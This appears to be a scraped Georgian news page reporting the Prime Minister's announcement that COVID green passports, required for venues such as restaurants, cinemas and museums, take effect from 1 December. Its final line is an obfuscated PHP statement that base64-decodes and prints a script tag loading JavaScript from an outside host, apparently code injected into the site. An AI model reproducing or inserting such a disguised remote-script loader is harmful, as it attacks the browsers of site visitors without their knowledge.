celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის განცხადებით, პირველი დეკემბრიდან ქვეყნის მასშტაბით ე.წ. კოვიდ/მწვანე პასპორტები ამოქმედდება.
 
ღარიბაშვილის თქმით, მწვანე სტატუსი ექნება პირს, რომელიც ორჯერადააა აცრილი კორონავირუსის საწინააღმდეგო ვაქცინით, პანდემიის განმავლობაში გადატანილი აქვს კორონავირუსი ან ბოლო 72 საათში PCR ხოლო 24 საათში სწრაფი ტესტი ექნება ჩატარებული.
 
ღარიბაშვილის თქმით, მწვანე პასპორტის მქონე პირებს შეეძლებათ სხვადასხვა ტიპის დაწესებულებებში ვიზიტი, თუმცა აღნიშნული სავალდებულო არ იქნება ამ დაწესებულებების თანამშრომლებისთვის:
 
„ჩვენ ახლა გვქონდა საკოორდინაციო საბჭოს სხდომა და განვიხილეთ მწვანე პასპორტის კონცეფციის თაობაზე. პირველი დეკმებრიდან ამოქმედდება მწვანე პასპორტების კონცეფცია და გაფართოვდება მისი მოქმედების არეალი. პირს მწვანე სტატუსი აქვს თუ იგი ვაქცინირებულია სრულად ანუ ორჯერ, ჩატარებული აქვს 72 საათიანი ვალიდურობის პისიარ ტესტი, ან 24 საათიანი ვალიდობის ანტიგენ ტესტი, ან გადატანილი აქვს კორონავირუსი პანდემიის განმავლობაში. მწვანე პასპორტის მოთხოვნა იმოქმედებს 18 წელს ზემოთ, ასევე ტურისტებისთვის.
 
ჩვენი საბჭოს გადაწყვეტილებით მოქალაქეები მხოლოდ მწვანე პასპორტით შეძლებენ შესვლას სხვასხვა ობიექტებში. ეს არის კვების, გასართობი ცენტრები, კინოთეატრები, ოპერა, მუზეუმები, საკონცენტრო დარბაზები, სამორინეები და ა.შ. აღნიშნული მოთხოვნა განხორციელდება სტუმრებზე და არა მომუშვეადამიანებზე“ – აცხადებს ირაკლი ღარიბაშვილი.
991
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");